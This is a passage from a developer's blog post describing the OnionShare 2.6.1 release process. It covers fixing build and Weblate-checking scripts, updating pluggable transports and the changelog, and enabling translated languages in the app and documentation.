^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1434, in invoke
return ctx.invoke(self.callback, **ctx.params)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 783, in invoke
return __callback(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 333, in main
get_tor_macos(gpg, torkey, platform_url, platform_filename, expected_platform_sig)
File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 161, in get_tor_macos
shutil.copyfile(
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/shutil.py", line 256, in copyfile
with open(src, 'rb') as fsrc:
^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/Volumes/Tor Browser/Tor Browser.app/Contents/MacOS/Tor/tor.real'
</code></pre>
<p>Hmm, I've hit my first problem. The error is: <code>FileNotFoundError: [Errno 2] No such file or directory: '/Volumes/Tor Browser/Tor Browser.app/Contents/MacOS/Tor/tor.real'</code>. Hold on a sec while I look into this...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>In the macOS version of Tor Browser 12.5.3, which is currently the latest version, it turns out that the file <code>Tor Browser.app/Contents/MacOS/Tor/tor.real</code> has been renamed to <code>Tor Browser.app/Contents/MacOS/Tor/tor</code>. The script was trying to copy the invalid path to the Tor binary and was crashing with an error, so I fixed the <code>get-tor.py</code> script to use the new filename.</p>
<p>This is the type of small problem that I typically hit while making a release, and that I go ahead and fix in order to finish the release.</p>
<p>I commited my changes to <code>RELEASE.md</code>.</p>
<p>I also updated the pluggable transports for Windows and macOS. The <code>desktop/scripts</code> folder includes the follow build scripts:</p>
<ul>
<li><code>build-pt-meek.ps1</code></li>
<li><code>build-pt-meek.sh</code></li>
<li><code>build-pt-obfs4proxy.ps1</code></li>
<li><code>build-pt-obfs4proxy.sh</code></li>
<li><code>build-pt-snowflake.ps1</code></li>
<li><code>build-pt-snowflake.sh</code></li>
</ul>
<p>The <code>.ps1</code> files are PowerShell scripts, for doing the Windows builds, and the <code>.sh</code> files are shell scripts, for macOS (and Linux, for dev purposes) builds. Each of these files starts out with a git tag to build. For example, <code>build-pt-meek.sh</code> starts like this:</p>
<div class="hll"><pre><span></span><span class="ch">#!/bin/bash</span>
<span class="nv">MEEK_TAG</span><span class="o">=</span>v0.37.0
</pre></div>
<p>I edited all of these, updated them the latest versions, and commited my changes: I updated meek to 0.38.0 and snowflake to 2.6.0--obfs4proxy was still using the latest version.</p>
<h2 id="updating-the-change-log">Updating the change log</h2><p>Each time I make a release I write an update to <code>CHANGELOG.md</code> to list the new major things have changed. The simplest way to keep track of all of this is via Github milestones. I look at all of the <a href="https://github.com/onionshare/onionshare/issues?q=is%3Aissue+milestone%3A2.6.1+is%3Aclosed">closed issue in the <code>2.6.1</code> milestone</a>, and then make sure that the change log includes all of these things in the 2.6.1 section. In this case, the changes are:</p>
<ul>
<li>Release updates: Automate builds with CI, make just 64-bit Windows release, make both Intel and Apple Silicon macOS releases</li>
<li>Upgrade dependencies, including Tor, meek, and snowflake</li>
<li>Bug fix: Restore the primary_action mode settings in a tab after OnionShare reconnects to Tor</li>
<li>Bug fix: Fix issue with auto-connecting to Tor with persistent tabs open</li>
<li>Bug fix: Fix packaging issue where Windows version of OnionShare conflicts with Windows version of Dangerzone</li>
</ul>
<h2 id="ensuring-the-documentation-is-up-to-date">Ensuring the documentation is up-to-date</h2><p>This release doesn't add any new features, so fortunately I don't have to spend any time documenting them all. It's mostly bug fixes, updating dependencies, and revamping how releases are made (thanks to automated builds with a GitHub Actions workflow).</p>
<h2 id="ensuring-the-localization-is-up-to-date">Ensuring the localization is up-to-date</h2><p>Volunteers on Weblate (often with the help of <a href="https://www.localizationlab.org/">Localization Lab</a>) translate all of the strings in the OnionShare desktop app into <a href="https://hosted.weblate.org/projects/onionshare/translations/">many different languages</a>. Likewise, they also translate the documentation, as well as the strings in the mobile apps. Right now there's no consistent list of languages that OnionShare supports. Basically whenever I make a release, if OnionShare has been at least 90% translated into a language, then we include that language in the release. Otherwise, we don't.</p>
<h3 id="updating-the-onionshare-desktop-strings">Updating the OnionShare desktop strings</h3><p>After volunteers translate the English strings into other languages, Weblate makes commits with those new strings into its own git repo at <a href="https://hosted.weblate.org/projects/onionshare/translations/">https://hosted.weblate.org/projects/onionshare/translations/</a>. I need to make sure that my local <code>onionshare</code> folder has this as a git remote called <code>weblate</code>, like this:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>remote<span class="w"> </span>add<span class="w"> </span>weblate<span class="w"> </span>https://hosted.weblate.org/projects/onionshare/translations/
</pre></div>
<p>Then I pull in all of the latest localization changes from Weblate:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>pull<span class="w"> </span>weblate<span class="w"> </span>main
</pre></div>
<p>That's all I need to do to update the translations for the desktop app. However, I still need to determine which languages have been at least 90% translated so I can know whether or not to include them in the language changing drop-down menu in OnionShare's Settings tab.</p>
<h3 id="checking-for-languages-with-that-are-at-least-90-translated">Checking for languages with that are at least 90% translated</h3><p>To check this, I need to run the script <code>docs/check-weblate.py</code>, passing in my Weblate API key. This is a script that uses the Weblate API to determine the percentage of the strings that have been translated into each language, for both the desktop app and the documentation:</p>
<pre><code>$ cd docs
$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
Traceback (most recent call last):
File "/Users/user/code/onionshare/docs/./check-weblate.py", line 146, in <module>
asyncio.run(main())
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/Users/user/code/onionshare/docs/./check-weblate.py", line 113, in main
languages[obj["code"]] = obj["language"]
~~~^^^^^^^^^^^^
KeyError: 'language'
</code></pre>
<p>And... I've hit another problem! Let me take a minute to debug this.</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>Okay, fixed. It turns out the Weblate API has slightly changed since the last time I made a release (it's been almost a year). Making a request to <a href="https://hosted.weblate.org/api/projects/onionshare/languages/">https://hosted.weblate.org/api/projects/onionshare/languages/</a> returns a list of objects, with each object representing a language that was included in the OnionShare project. Each language object includes the name of the language, like <code>Uyghur</code>, and the language code, like <code>ug</code>. The key for name of the language used to be <code>language</code>, and the key for the language code was <code>code</code>. It turns out, the name of the language is now using the key <code>name</code> instead of <code>language</code>. So, I fixed it by changing this line:</p>
<div class="hll"><pre><span></span><span class="n">languages</span><span class="p">[</span><span class="n">obj</span><span class="p">[</span><span class="s2">"code"</span><span class="p">]]</span> <span class="o">=</span> <span class="n">obj</span><span class="p">[</span><span class="s2">"language"</span><span class="p">]</span>
</pre></div>
<p>To this:</p>
<div class="hll"><pre><span></span><span class="n">languages</span><span class="p">[</span><span class="n">obj</span><span class="p">[</span><span class="s2">"code"</span><span class="p">]]</span> <span class="o">=</span> <span class="n">obj</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]</span>
</pre></div>
<p>Okay, the <code>check-weblate.py</code> script should work now, though it takes a long time to finish running. The OnionShare project has 70 languages listed in Weblate, so it makes 70 HTTP requests for the OnionShare desktop app strings, one for each language, and also another 70 HTTP requests for each of the nine pages of OnionShare documentation. In order to avoid hammering the Weblate server, it waits one second between HTTP requests, meaning that it it spends 700 seconds (or 11 minutes and 40 seconds) just waiting between HTTP requests.</p>
<p>Here's what happens when I run it:</p>
<pre><code>$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
GET https://hosted.weblate.org/api/translations/onionshare/translations/af/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sq/
GET https://hosted.weblate.org/api/translations/onionshare/translations/am/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ar/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hy/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ay/
GET https://hosted.weblate.org/api/translations/onionshare/translations/be/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bs/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bg/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ca/
GET https://hosted.weblate.org/api/translations/onionshare/translations/zh_Hans/
GET https://hosted.weblate.org/api/translations/onionshare/translations/zh_Hant/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/cs/
GET https://hosted.weblate.org/api/translations/onionshare/translations/da/
GET https://hosted.weblate.org/api/translations/onionshare/translations/nl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/en/
GET https://hosted.weblate.org/api/translations/onionshare/translations/eo/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/fil/
GET https://hosted.weblate.org/api/translations/onionshare/translations/fi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/fr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/gl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ka/
GET https://hosted.weblate.org/api/translations/onionshare/translations/de/
GET https://hosted.weblate.org/api/translations/onionshare/translations/el/
GET https://hosted.weblate.org/api/translations/onionshare/translations/gu/
GET https://hosted.weblate.org/api/translations/onionshare/translations/he/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hu/
GET https://hosted.weblate.org/api/translations/onionshare/translations/is/
GET https://hosted.weblate.org/api/translations/onionshare/translations/id/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ga/
GET https://hosted.weblate.org/api/translations/onionshare/translations/it/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ja/
GET https://hosted.weblate.org/api/translations/onionshare/translations/km/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ko/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ckb/
GET https://hosted.weblate.org/api/translations/onionshare/translations/lt/
GET https://hosted.weblate.org/api/translations/onionshare/translations/lg/
GET https://hosted.weblate.org/api/translations/onionshare/translations/mk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ms/
GET https://hosted.weblate.org/api/translations/onionshare/translations/nb_NO/
GET https://hosted.weblate.org/api/translations/onionshare/translations/om/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/fa/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pt_BR/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pt_PT/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pa/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ro/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ru/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sr_Latn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/si/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/es/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sw/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sv/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ta/
GET https://hosted.weblate.org/api/translations/onionshare/translations/te/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bo/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tk/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/uk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ug/
GET https://hosted.weblate.org/api/translations/onionshare/translations/vi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/wo/
GET https://hosted.weblate.org/api/translations/onionshare/translations/yo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-advanced/af/
GET https://hosted.weblate.org/api/translations/onionshare/doc-advanced/sq/
--snip--
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/wo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/yo/
Traceback (most recent call last):
File "/Users/user/code/onionshare/docs/./check-weblate.py", line 146, in <module>
asyncio.run(main())
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/Users/user/code/onionshare/docs/./check-weblate.py", line 136, in main
await app_percent_output(90, 101)
File "/Users/user/code/onionshare/docs/./check-weblate.py", line 53, in app_percent_output
app_translations[lang_code] >= percent_min
~~~~~~~~~~~~~~~~^^^^^^^^^^^
KeyError: 'eo'
</code></pre>
<p>Eek, I've hit another issue. And unfortunately I hit it <em>after</em> making all of those HTTP requests. This means that once I fix it, I'll have to make them all over again. Alright hang on while I fix this...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>Fixed it. The problem here is that Esperanto (the language with code <code>eo</code>) was listed in the OnionShare weblate project, however no one started translating the OnionShare app itself into that language. That's why, if you look back at the output, the Weblate API returned 404 when making the <code>eo</code> request:</p>
<pre><code>GET https://hosted.weblate.org/api/translations/onionshare/translations/eo/ | error 404
</code></pre>
<p>The solution here is to just make the <code>check-weblate.py</code> script less brittle by making sure a language exists before checking the percentage it's been translated. I do that by replacing this if statement:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o">>=</span> <span class="n">percent_min</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o"><</span> <span class="n">percent_max</span>
<span class="p">):</span>
</pre></div>
<p>With this one:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="n">lang_code</span> <span class="ow">in</span> <span class="n">app_translations</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o">>=</span> <span class="n">percent_min</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o"><</span> <span class="n">percent_max</span>
<span class="p">):</span>
</pre></div>
<p>Alright, the third time's a charm:</p>
<pre><code>$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
GET https://hosted.weblate.org/api/translations/onionshare/translations/af/
--snip--
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/wo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/yo/
App translations >= 90%
=======================
Afrikaans (af), 100.0%
Albanian (sq), 99.2%
Arabic (ar), 100.0%
Belarusian (be), 100.0%
Catalan (ca), 100.0%
Chinese (Simplified) (zh_Hans), 100.0%
Chinese (Traditional) (zh_Hant), 100.0%
Croatian (hr), 98.4%
Czech (cs), 100.0%
English (en), 100.0%
Finnish (fi), 100.0%
French (fr), 100.0%
German (de), 100.0%
Greek (el), 100.0%
Icelandic (is), 100.0%
Italian (it), 91.7%
Japanese (ja), 100.0%
Lithuanian (lt), 99.2%
Norwegian Bokmål (nb_NO), 90.2%
Persian (fa), 98.8%
Polish (pl), 100.0%
Portuguese (Brazil) (pt_BR), 99.6%
Russian (ru), 99.2%
Shona (sn), 98.8%
Spanish (es), 100.0%
Swahili (sw), 99.2%
Swedish (sv), 99.2%
Turkish (tr), 100.0%
Ukrainian (uk), 100.0%
Vietnamese (vi), 100.0%
App translations >= 50%
=======================
Bengali (bn), 88.2%
Danish (da), 67.9%
Dutch (nl), 73.8%
Galician (gl), 82.4%
Indonesian (id), 68.3%
Irish (ga), 53.5%
Khmer (Central) (km), 83.2%
Kurdish (Central) (ckb), 64.0%
Portuguese (Portugal) (pt_PT), 84.7%
Romanian (ro), 50.3%
Serbian (latin) (sr_Latn), 75.7%
Slovak (sk), 64.0%
App translations >= 0%
=======================
Amharic (am), 1.1%
Armenian (hy), 0.0%
Aymara (ay), 0.0%
Bosnian (bs), 0.0%
Bulgarian (bg), 35.1%
Filipino (fil), 0.0%
Georgian (ka), 1.9%
Gujarati (gu), 4.2%
Hebrew (he), 9.3%
Hindi (hi), 39.8%
Hungarian (hu), 28.5%
Korean (ko), 28.1%
Luganda (lg), 0.0%
Macedonian (mk), 2.7%
Malay (ms), 5.0%
Punjabi (pa), 1.1%
Sinhala (si), 0.7%
Slovenian (sl), 10.5%
Tagalog (tl), 0.0%
Tamil (ta), 0.0%
Telugu (te), 48.4%
Tibetan (bo), 0.0%
Uyghur (ug), 0.0%
Wolof (wo), 0.0%
Yoruba (yo), 8.5%
Docs translations >= 90%
========================
English (en), 100%
French (fr), 100%
Greek (el), 100%
Polish (pl), 100%
Spanish (es), 100%
Turkish (tr), 100%
Ukrainian (uk), 100%
Vietnamese (vi), 100%
Docs translations >= 50%
========================
Afrikaans (af), 81%
Chinese (Simplified) (zh_Hans), 59%
Chinese (Traditional) (zh_Hant), 59%
Czech (cs), 59%
Finnish (fi), 69%
German (de), 79%
Italian (it), 76%
Japanese (ja), 60%
Khmer (Central) (km), 77%
Norwegian Bokmål (nb_NO), 76%
Portuguese (Brazil) (pt_BR), 84%
Portuguese (Portugal) (pt_PT), 54%
Russian (ru), 79%
Swahili (sw), 74%
Swedish (sv), 65%
Docs translations >= 0%
========================
Arabic (ar), 40%
Belarusian (be), 33%
Bengali (bn), 29%
Bulgarian (bg), 16%
Catalan (ca), 36%
Croatian (hr), 30%
Dutch (nl), 43%
Filipino (fil), 13%
Galician (gl), 27%
Icelandic (is), 22%
Indonesian (id), 15%
Irish (ga), 22%
Korean (ko), 43%
Kurdish (Central) (ckb), 39%
Lithuanian (lt), 5%
Serbian (latin) (sr_Latn), 31%
Slovak (sk), 30%
</code></pre>
<p>Excellent, now I know which languages to enable in the OnionShare app, as well as which languages to enable in the documentation.</p>
<h3 id="enabling-languages-in-the-onionshare-app">Enabling languages in the OnionShare app</h3><p>I'll add the newly translated languages to OnionShare in a minute, but first I will update the internal lists of country names, each list of countries translated into a different language.</p>
<p>OnionShare has a <a href="https://micahflee.com/2022/10/new-censorship-circumvention-features-come-to-onionshare-26/">censorship circumvention workflow</a> that can attempt to automatically connect even you're in a place that blocks access to Tor. For this to work though, it needs to know what country you're in to guess which censorship circumvention technique is most likely to work. It could automatically detect your country based on your IP address, or alternatively you can specify what country you're in. If your language is set to, say, Vietnamese, then when you select your country, the list of country names should be written in Vietnamese. That's why OnionShare includes these country name lists.</p>
<p>To update the translations of country names, I ran this:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/countries-update-list.py
</pre></div>
<p>Great. Next, I want to enable the correct languages. From the <code>check-weblate.py</code> output above, I can tell that I should enable the following languages in the OnionShare desktop app for this release:</p>
<ul>
<li>Afrikaans (af), 100.0%</li>
<li>Albanian (sq), 99.2%</li>
<li>Arabic (ar), 100.0%</li>
<li>Belarusian (be), 100.0%</li>
<li>Catalan (ca), 100.0%</li>
<li>Chinese (Simplified) (zh_Hans), 100.0%</li>
<li>Chinese (Traditional) (zh_Hant), 100.0%</li>
<li>Croatian (hr), 98.4%</li>
<li>Czech (cs), 100.0%</li>
<li>English (en), 100.0%</li>
<li>Finnish (fi), 100.0%</li>
<li>French (fr), 100.0%</li>
<li>German (de), 100.0%</li>
<li>Greek (el), 100.0%</li>
<li>Icelandic (is), 100.0%</li>
<li>Italian (it), 91.7%</li>
<li>Japanese (ja), 100.0%</li>
<li>Lithuanian (lt), 99.2%</li>
<li>Norwegian Bokmål (nb_NO), 90.2%</li>
<li>Persian (fa), 98.8%</li>
<li>Polish (pl), 100.0%</li>
<li>Portuguese (Brazil) (pt_BR), 99.6%</li>
<li>Russian (ru), 99.2%</li>
<li>Shona (sn), 98.8%</li>
<li>Spanish (es), 100.0%</li>
<li>Swahili (sw), 99.2%</li>
<li>Swedish (sv), 99.2%</li>
<li>Turkish (tr), 100.0%</li>
<li>Ukrainian (uk), 100.0%</li>
<li>Vietnamese (vi), 100.0%</li>
</ul>
<p>I do that by editing the <code>self.available_locales</code> dictionary in <code>cli/onionshare_cli/settings.py</code>. In OnionShare 2.6 there were only 10 languages enabled, but in version 2.6.1 there will be 30! The translators have been quite busy. Here's the new <code>self.available_locales</code> that I've added:</p>
<div class="hll"><pre><span></span><span class="c1"># Dictionary of available languages in this version of OnionShare,</span>
<span class="c1"># mapped to the language name, in that language</span>
<span class="bp">self</span><span class="o">.</span><span class="n">available_locales</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"af"</span><span class="p">:</span> <span class="s2">"Afrikaans"</span><span class="p">,</span> <span class="c1"># Afrikaans</span>
<span class="s2">"sq"</span><span class="p">:</span> <span class="s2">"Shqip"</span><span class="p">,</span> <span class="c1"># Albanian</span>
<span class="s2">"ar"</span><span class="p">:</span> <span class="s2">"العربية"</span><span class="p">,</span> <span class="c1"># Arabic</span>
<span class="s2">"be"</span><span class="p">:</span> <span class="s2">"Беларуская"</span><span class="p">,</span> <span class="c1"># Belarusian</span>
<span class="c1"># "bn": "বাংলা", # Bengali</span>
<span class="s2">"ca"</span><span class="p">:</span> <span class="s2">"Català"</span><span class="p">,</span> <span class="c1"># Catalan</span>
<span class="s2">"zh_Hant"</span><span class="p">:</span> <span class="s2">"正體中文 (繁體)"</span><span class="p">,</span> <span class="c1"># Traditional Chinese</span>
<span class="s2">"zh_Hans"</span><span class="p">:</span> <span class="s2">"中文 (简体)"</span><span class="p">,</span> <span class="c1"># Simplified Chinese</span>
<span class="s2">"hr"</span><span class="p">:</span> <span class="s2">"Hrvatski"</span><span class="p">,</span> <span class="c1"># Croatian</span>
<span class="s2">"cs"</span><span class="p">:</span> <span class="s2">"čeština"</span><span class="p">,</span> <span class="c1"># Czech</span>
<span class="c1"># "da": "Dansk", # Danish</span>
<span class="c1"># "nl": "Nederlands", # Dutch</span>
<span class="s2">"en"</span><span class="p">:</span> <span class="s2">"English"</span><span class="p">,</span> <span class="c1"># English</span>
<span class="s2">"fi"</span><span class="p">:</span> <span class="s2">"Suomi"</span><span class="p">,</span> <span class="c1"># Finnish</span>
<span class="s2">"fr"</span><span class="p">:</span> <span class="s2">"Français"</span><span class="p">,</span> <span class="c1"># French</span>
<span class="c1"># "gl": "Galego", # Galician</span>
<span class="s2">"de"</span><span class="p">:</span> <span class="s2">"Deutsch"</span><span class="p">,</span> <span class="c1"># German</span>
<span class="s2">"el"</span><span class="p">:</span> <span class="s2">"Ελληνικά"</span><span class="p">,</span> <span class="c1"># Greek</span>
<span class="s2">"is"</span><span class="p">:</span> <span class="s2">"Íslenska"</span><span class="p">,</span> <span class="c1"># Icelandic</span>
<span class="c1"># "id": "Bahasa Indonesia", # Indonesian</span>
<span class="c1"># "ga": "Gaeilge", # Irish</span>
<span class="s2">"it"</span><span class="p">:</span> <span class="s2">"Italiano"</span><span class="p">,</span> <span class="c1"># Italian</span>
<span class="s2">"ja"</span><span class="p">:</span> <span class="s2">"日本語"</span><span class="p">,</span> <span class="c1"># Japanese</span>
<span class="c1"># "ckb": "Soranî", # Kurdish (Central)</span>
<span class="s2">"lt"</span><span class="p">:</span> <span class="s2">"Lietuvių Kalba"</span><span class="p">,</span> <span class="c1"># Lithuanian</span>
<span class="s2">"nb_NO"</span><span class="p">:</span> <span class="s2">"Norsk Bokmål"</span><span class="p">,</span> <span class="c1"># Norwegian Bokmål</span>
<span class="s2">"fa"</span><span class="p">:</span> <span class="s2">"فارسی"</span><span class="p">,</span> <span class="c1"># Persian</span>
<span class="s2">"pl"</span><span class="p">:</span> <span class="s2">"Polski"</span><span class="p">,</span> <span class="c1"># Polish</span>
<span class="s2">"pt_BR"</span><span class="p">:</span> <span class="s2">"Português (Brasil)"</span><span class="p">,</span> <span class="c1"># Portuguese Brazil</span>
<span class="c1"># "pt_PT": "Português (Portugal)", # Portuguese Portugal</span>
<span class="c1"># "ro": "Română", # Romanian</span>
<span class="s2">"ru"</span><span class="p">:</span> <span class="s2">"Русский"</span><span class="p">,</span> <span class="c1"># Russian</span>
<span class="s2">"sn"</span><span class="p">:</span> <span class="s2">"chiShona"</span><span class="p">,</span> <span class="c1"># Shona</span>
<span class="c1"># "sr_Latn": "Srpska (latinica)", # Serbian (latin)</span>
<span class="c1"># "sk": "Slovenčina", # Slovak</span>
<span class="s2">"es"</span><span class="p">:</span> <span class="s2">"Español"</span><span class="p">,</span> <span class="c1"># Spanish</span>
<span class="s2">"sw"</span><span class="p">:</span> <span class="s2">"Kiswahili"</span><span class="p">,</span> <span class="c1"># Swahili</span>
<span class="s2">"sv"</span><span class="p">:</span> <span class="s2">"Svenska"</span><span class="p">,</span> <span class="c1"># Swedish</span>
<span class="c1"># "te": "తెలుగు", # Telugu</span>
<span class="s2">"tr"</span><span class="p">:</span> <span class="s2">"Türkçe"</span><span class="p">,</span> <span class="c1"># Turkish</span>
<span class="s2">"uk"</span><span class="p">:</span> <span class="s2">"Українська"</span><span class="p">,</span> <span class="c1"># Ukrainian</span>
<span class="s2">"vi"</span><span class="p">:</span> <span class="s2">"Tiếng Việt"</span><span class="p">,</span> <span class="c1"># Vietnamese</span>
<span class="p">}</span>
</pre></div>
<p>This dictionary maps language codes to languages names, in that language. For most of these languages I had to look up how to write their names <a href="https://www.omniglot.com/language/names.htm">here</a>. Note that several languages in this code block are commented out--these are languages that have once been included in OnionShare, but that I'm not enabling in this release since they aren't at least 90% translated this time around.</p>
<p>After making this change, I decided to test it out. I made sure to follow the <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md">instructions</a> in <code>desktop/README.md</code> to make sure my computer has a local development environment, and then I ran OnionShare from the source tree:</p>
<pre><code>poetry run onionshare -v
</code></pre>
<p>After connecting to Tor, I opened the Settings tab and sure enough, all of these languages are listed in the language dropdown:</p>
<p><img src="onionshare-languages.png" alt="The OnionShare language dropdown"></p>
<p>I ran OnionShare again, opened Settings, and changed my language to Tiếng Việt (Vietnamese). It prompted me (in Vietnamese) to restart OnionShare, and so I did. I then opened it again, and there we have it: OnionShare in Vietnamese.</p>
<p><img src="onionshare-vietnamese.png" alt="OnionShare in Vietnamese"></p>
<h3 id="enabling-languages-in-the-documentation">Enabling languages in the documentation</h3><p>From the <code>check-weblate.py</code> output above, I can tell that I should enable the following languages in the documentation for this release:</p>
<ul>
<li>English (en), 100%</li>
<li>French (fr), 100%</li>
<li>Greek (el), 100%</li>
<li>Polish (pl), 100%</li>
<li>Spanish (es), 100%</li>
<li>Turkish (tr), 100%</li>
<li>Ukrainian (uk), 100%</li>
<li>Vietnamese (vi), 100%</li>
</ul>
<p>I do that by editing <code>docs/source/conf.py</code> and updating the <code>languages</code> list of tuples. This time, the documentation will be translated into 8 languages. Here's the new <code>languages</code> list:</p>
<div class="hll"><pre><span></span><span class="n">languages</span> <span class="o">=</span> <span class="p">[</span>
<span class="p">(</span><span class="s2">"English"</span><span class="p">,</span> <span class="s2">"en"</span><span class="p">),</span> <span class="c1"># English</span>
<span class="p">(</span><span class="s2">"Français"</span><span class="p">,</span> <span class="s2">"fr"</span><span class="p">),</span> <span class="c1"># French</span>
<span class="c1"># ("Deutsch", "de"), # German</span>
<span class="p">(</span><span class="s2">"Ελληνικά"</span><span class="p">,</span> <span class="s2">"el"</span><span class="p">),</span> <span class="c1"># Greek</span>
<span class="c1"># ("Italiano", "it"), # Italian</span>
<span class="c1"># ("日本語", "ja"), # Japanese</span>
<span class="c1"># ("ភាសាខ្មែរ", "km"), # Khmer (Central)</span>
<span class="c1"># ("Norsk Bokmål", "nb_NO"), # Norwegian Bokmål</span>
<span class="p">(</span><span class="s2">"Polish"</span><span class="p">,</span> <span class="s2">"pl"</span><span class="p">),</span> <span class="c1"># Polish</span>
<span class="c1"># ("Portuguese (Brazil)", "pt_BR"), # Portuguese (Brazil))</span>
<span class="c1"># ("Русский", "ru"), # Russian</span>
<span class="p">(</span><span class="s2">"Español"</span><span class="p">,</span> <span class="s2">"es"</span><span class="p">),</span> <span class="c1"># Spanish</span>
<span class="c1"># ("Svenska", "sv"), # Swedish</span>
<span class="p">(</span><span class="s2">"Türkçe"</span><span class="p">,</span> <span class="s2">"tr"</span><span class="p">),</span> <span class="c1"># Turkish</span>
